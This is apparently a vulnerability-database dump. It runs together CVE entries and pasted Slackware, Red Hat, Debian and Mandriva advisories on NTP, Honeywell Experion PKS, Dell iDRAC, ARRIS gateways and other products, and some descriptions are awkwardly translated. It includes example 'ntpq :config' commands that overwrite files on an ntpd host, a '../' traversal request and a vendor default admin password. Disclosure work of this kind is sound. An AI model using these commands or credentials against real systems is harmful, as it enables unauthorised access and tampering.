enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz MD5 signatures: +-------------+ Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz Installation instructions: +------------------------+ Upgrade the package as root: # upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz Then, restart the NTP daemon: # sh /etc/rc.d/rc.ntpd restart +-----+ Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com +------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
VAR-201510-0706 CVE-2014-9751 NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The read_network_packet function in ntp_io.c in ntpd in NTP 4.x before 4.2.8p1 on Linux and OS X does not properly determine whether a source IP address is an IPv6 loopback address, which makes it easier for remote attackers to spoof restricted packets, and read or write to the runtime state, by leveraging the ability to reach the ntpd machine's network interface with a packet from the ::1 address. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. NTP is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 ===================================================================== 1. Summary: Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64 3. Description: The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service. It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751) A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799) A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405) A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. (CVE-2014-9297, CVE-2014-9750) It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798) The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat. Bug fixes: * The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111) * The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014) * Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116) * The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640) Enhancements: * This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828) * This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154) * Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702) All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. slew [PATCH] 1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto 1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks 1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems 6. Package List: Red Hat Enterprise Linux Client (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted package to cause ntpd to crash if: * ntpd enabled remote configuration * The attacker had the knowledge of the configuration password * The attacker had access to a computer entrusted to perform remote configuration Note that remote configuration is disabled by default in NTP. CVE-2015-5194 It was found that ntpd could crash due to an uninitialized variable when processing malformed logconfig configuration commands. CVE-2015-5195 It was found that ntpd exits with a segmentation fault when a statistics type that was not enabled during compilation (e.g. timingstats) is referenced by the statistics or filegen configuration command CVE-2015-5219 It was discovered that sntp program would hang in an infinite loop when a crafted NTP packet was received, related to the conversion of the precision value in the packet to double. CVE-2015-5300 It was found that ntpd did not correctly implement the -g option: Normally, ntpd exits with a message to the system log if the offset exceeds the panic threshold, which is 1000 s by default. This option allows the time to be set to any value without restriction; however, this can happen only once. If the threshold is exceeded after that, ntpd will exit with a message to the system log. This option can be used with the -q and -x options. ntpd could actually step the clock multiple times by more than the panic threshold if its clock discipline doesn't have enough time to reach the sync state and stay there for at least one update. If a man-in-the-middle attacker can control the NTP traffic since ntpd was started (or maybe up to 15-30 minutes after that), they can prevent the client from reaching the sync state and force it to step its clock by any amount any number of times, which can be used by attackers to expire certificates, etc. This is contrary to what the documentation says. Normally, the assumption is that an MITM attacker can step the clock more than the panic threshold only once when ntpd starts and to make a larger adjustment the attacker has to divide it into multiple smaller steps, each taking 15 minutes, which is slow. CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 It was found that the fix for CVE-2014-9750 was incomplete: three issues were found in the value length checks in ntp_crypto.c, where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. CVE-2015-7701 A memory leak flaw was found in ntpd's CRYPTO_ASSOC. CVE-2015-7703 Miroslav Lichvar of Red Hat found that the :config command can be used to set the pidfile and driftfile paths without any restrictions. A remote attacker could use this flaw to overwrite a file on the file system with a file containing the pid of the ntpd process (immediately) or the current estimated drift of the system clock (in hourly intervals). For example: ntpq -c ':config pidfile /tmp/ntp.pid' ntpq -c ':config driftfile /tmp/ntp.drift' In Debian ntpd is configured to drop root privileges, which limits the impact of this issue. CVE-2015-7704 If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet from the server to reduce its polling rate, it doesn't check if the originate timestamp in the reply matches the transmit timestamp from its request. An off-path attacker can send a crafted KoD packet to the client, which will increase the client's polling interval to a large value and effectively disable synchronization with the server. CVE-2015-7850 An exploitable denial of service vulnerability exists in the remote configuration functionality of the Network Time Protocol. A specially crafted configuration file could cause an endless loop resulting in a denial of service. An attacker could provide a the malicious configuration file to trigger this vulnerability. CVE-2015-7852 A potential off by one vulnerability exists in the cookedprint functionality of ntpq. A specially crafted buffer could cause a buffer overflow potentially resulting in null byte being written out of bounds. CVE-2015-7855 It was found that NTP's decodenetnum() would abort with an assertion failure when processing a mode 6 or mode 7 packet containing an unusually long data value where a network address was expected. This could allow an authenticated attacker to crash ntpd. CVE-2015-7871 An error handling logic error exists within ntpd that manifests due to improper error condition handling associated with certain crypto-NAK packets. An unauthenticated, off-path attacker can force ntpd processes on targeted servers to peer with time sources of the attacker's choosing by transmitting symmetric active crypto-NAK packets to ntpd. This attack bypasses the authentication typically required to establish a peer association and allows an attacker to make arbitrary changes to system time. For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6. For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1. For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3. For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3. We recommend that you upgrade your ntp packages
VAR-201412-0434 CVE-2014-9223 Allegro rompager buffer overflow vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Multiple buffer overflows in AllegroSoft RomPager, as used in Huawei Home Gateway products and other vendors and products, allow remote attackers to cause a denial of service or possibly execute arbitrary code via unspecified vectors related to authorization. Allegro's RomPager is an embedded WEB service product, which is more used to provide WWW management capabilities for network printers, switches and other network devices. Allegro RomPager is vulnerable to a buffer overflow because it fails to perform adequate boundary checks on user-supplied input. An attacker could exploit this vulnerability to execute arbitrary code in the context of an affected application. Failed exploit attempts will likely result in denial-of-service conditions. Allegro RomPager 4.07 and prior to 4.34 are vulnerable
VAR-201904-0511 CVE-2014-5435 Honeywell Experion PKS 'dual_onsrv.exe' Module Remote Code Execution Vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An arbitrary memory write vulnerability exists in the dual_onsrv.exe module in Honeywell Experion PKS R40x before R400.6, R41x before R410.6, and R43x before R430.2, that could lead to possible remote code execution or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Or initiate a denial of service attack. Failed exploit attempts will result in a denial-of-service condition. The following versions are affected: Honeywell Experion R40x versions prior to Experion PKS R400.6 Honeywell Experion R41x versions prior to Experion PKS R410.6 Honeywell Experion R43x versions prior to Experion PKS R430.2
VAR-201412-0413 CVE-2014-9193 Innominate mGuard In the firmware root Privileged vulnerability CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Innominate mGuard with firmware before 7.6.6 and 8.x before 8.1.4 allows remote authenticated admins to obtain root privileges by changing a PPP configuration setting. mGuard is a product line of Innominate, including firewalls and VPN network security devices. Innominate mGuard is prone to a remote privilege-escalation vulnerability. A remote attacker can exploit this issue to gain root privileges and execute arbitrary commands. Innominate mGuard 8.1.3 and prior are vulnerable. A security vulnerability exists in Innominate mGuard using firmware versions prior to 7.6.6 and 8.x versions prior to 8.1.4
VAR-201412-0586 CVE-2014-7249 Multiple Allied Telesis products vulnerable to buffer overflow CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow on the Allied Telesis AR440S, AR441S, AR442S, AR745, AR750S, AR750S-DP, AT-8624POE, AT-8624T/2M, AT-8648T/2SP, AT-8748XL, AT-8848, AT-9816GB, AT-9924T, AT-9924Ts, CentreCOM AR415S, CentreCOM AR450S, CentreCOM AR550S, CentreCOM AR570S, CentreCOM 8700SL, CentreCOM 8948XL, CentreCOM 9924SP, CentreCOM 9924T/4SP, Rapier 48i, and SwitchBlade4000 with firmware before 2.9.1-21 allows remote attackers to execute arbitrary code via a crafted HTTP POST request. Allied Telesis AT-RG634A ADSL Broadband Router is an ADSL broadband router product from Allied Telesis. A buffer overflow vulnerability exists in multiple Allied Telesis products that use firmware version 2.9.1-21. Failed exploit attempts may result in a denial-of-service condition. The following products and versions are affected: Allied Telesis AR440S, AR441S, AR442S, AR745, AR750S, AR750S-DP, AT-8624POE, AT-8624T/2M, AT-8648T/2SP, AT- 8748XL , AT-8848 , AT-9816GB , AT-9924T , AT-9924Ts , CentreCOM AR415S , CentreCOM AR450S , CentreCOM AR550S , CentreCOM AR570S , CentreCOM 8700SL , CentreCOM 8948XL , CentreCOM 9924SP , CentreCOM 9924T/4SP , Rapier 48i , SwitchBlade4000
VAR-201412-0101 CVE-2014-9406 ARRIS Touchstone TG862G/CT Telephony Gateway Vulnerabilities in which access rights can be obtained in firmware CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
ARRIS Touchstone TG862G/CT Telephony Gateway with firmware 7.6.59S.CT and earlier has a default password of password for the admin account, which makes it easier for remote attackers to obtain access via a request to home_loggedout.php. ARRIS Touchstone TG862G/CT Telephony Gateway is a Modem (Modem) router integrated machine from Arris Group of the United States. Touchstone Tg862g%2Fct Firmware is prone to a remote security vulnerability. A remote attacker could exploit this vulnerability by sending a request to the home_loggedout.php script to gain access
VAR-201903-0651 CVE-2014-9187 Honeywell Experion PKS Module buffer error vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Multiple heap-based buffer overflow vulnerabilities exist in Honeywell Experion PKS all versions prior to R400.6, all versions prior to R410.6, and all versions prior to R430.2 modules, which could lead to possible remote code execution or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS The module contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Honeywell Experion PKS has multiple remote heap buffer overflow vulnerabilities because it fails to perform sufficient boundary checking on user-supplied inputs. Allows an attacker to exploit a vulnerability to execute arbitrary code or initiate a denial of service attack in the context of the affected user's application. The following versions are affected: Honeywell Experion R40x versions prior to Experion PKS R400.6 Honeywell Experion R41x versions prior to Experion PKS R410.6 Honeywell Experion R43x versions prior to Experion PKS R430.2
VAR-201904-0512 CVE-2014-5436 Honeywell Experion PKS 'confd.exe' Module directory traversal vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A directory traversal vulnerability exists in the confd.exe module in Honeywell Experion PKS R40x before R400.6, R41x before R410.6, and R43x before R430.2, which could lead to possible information disclosure. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS Contains a path traversal vulnerability.Information may be obtained. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. A remote attacker can use a specially crafted request ('../') with a directory traversal sequence to retrieve arbitrary files from the application for sensitive information. Information obtained could aid in further attacks. The following versions are affected: Honeywell Experion R40x versions prior to Experion PKS R400.6 Honeywell Experion R41x versions prior to Experion PKS R410.6 Honeywell Experion R43x versions prior to Experion PKS R430.2
VAR-201903-0652 CVE-2014-9189 Honeywell Experion PKS Module buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Multiple stack-based buffer overflow vulnerabilities were found in Honeywell Experion PKS all versions prior to R400.6, all versions prior to R410.6, and all versions prior to R430.2 modules that could lead to possible remote code execution, dynamic memory corruption, or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS The module contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Honeywell Experion PKS has multiple stack buffer overflow vulnerabilities because the application failed to properly check the user-supplied data before copying it to a full-size buffer. A remote attacker could exploit these vulnerabilities to execute arbitrary code or cause dynamic memory corruption in the context of an affected application. Failed attempts will likely cause a denial-of-service condition. The following versions are affected: Honeywell Experion R40x versions prior to Experion PKS R400.6 Honeywell Experion R41x versions prior to Experion PKS R410.6 Honeywell Experion R43x versions prior to Experion PKS R430.2. The vulnerability is due to insufficient boundary checks performed on the user-supplied input by the affected software. An attacker could exploit this vulnerability by sending a crafted request to the affected software. Honeywell has confirmed this vulnerability and released updated software
VAR-201412-0537 CVE-2014-8272 Multiple Dell iDRAC IPMI v1.5 implementations use insufficiently random session ID values CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The IPMI 1.5 functionality in Dell iDRAC6 modular before 3.65, iDRAC6 monolithic before 1.98, and iDRAC7 before 1.57.57 does not properly select session ID values, which makes it easier for remote attackers to execute arbitrary commands via a brute-force attack. Intelligent Platform Management Interface (IPMI) v1.5 Multiple implementations of the protocol Dell iDRAC The product contains a command injection vulnerability due to a session management issue. CWE-330: Use of Insufficiently Random Values http://cwe.mitre.org/data/definitions/330.html Sessions where random values should be used ID Is assigned regularly, so Dell iDRAC Next session used by the user logged in ID May be guessed. Also session ID Because the range of values used as is small, it is easy to guess by brute force attacks. Dell Computer Corporation, Inc. Information for VU#843044 (http://www.kb.cert.org/vuls/id/BLUU-9RDQHM) Then Dell Says: * The legacy nature of the IPMI 1.5 protocol exposes several weaknesses in * the overall design and implementation. These are: * Use of an insecure (unencrypted) channel for communication. * Poor password management including limited password length. * Limited session management capability. * These weaknesses are inherent in the overall design and implementation * of the protocol, therefore support for the IPMI 1.5 version of the protocol * has been permanently removed. This means that it will not be possible to * reactivate or enable it in an operational setting.By a remote third party, Dell iDRAC Could be hijacked to connect to and execute arbitrary commands. Multiple Dell iDRAC Products are prone to a vulnerability that lets attackers inject arbitrary commands. Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks. Dell iDRAC6 modular, iDRAC6 monolithic and iDRAC7 are all system management solutions from Dell (Dell) including hardware and software. This solution provides functions such as remote management, crash recovery and power control for Dell PowerEdge systems. , which provides the ability to monitor, control, and automatically report on the health of a large number of servers. A security vulnerability exists in IPMI version 1.5 of several Dell products. The following products and versions are affected: Dell iDRAC6 modular 3.60 and earlier, iDRAC6 monolithic 1.97 and earlier, iDRAC7 1.56.55 and earlier
VAR-201412-0515 CVE-2014-3580 Apache Subversion of mod_dav_svn Apache HTTPD server Service disruption in modules (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apache subversion is prone to a remote denial-of-service vulnerability. Exploiting this issue allows remote attackers to crash the affected process, causing denial of service conditions. Subversion versions 1.7.0 through 1.7.18 and 1.8.0 through 1.8.10 are affected. Subversion is an open source version control system of the Apache Software Foundation in the United States. The main function of the system is to be compatible with the concurrent version management system (CVS). The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFUqoNCmqjQ0CJFipgRAqwFAKCUALR1yu7OcAY6tP4LrYCdhQMJDACg7FG5 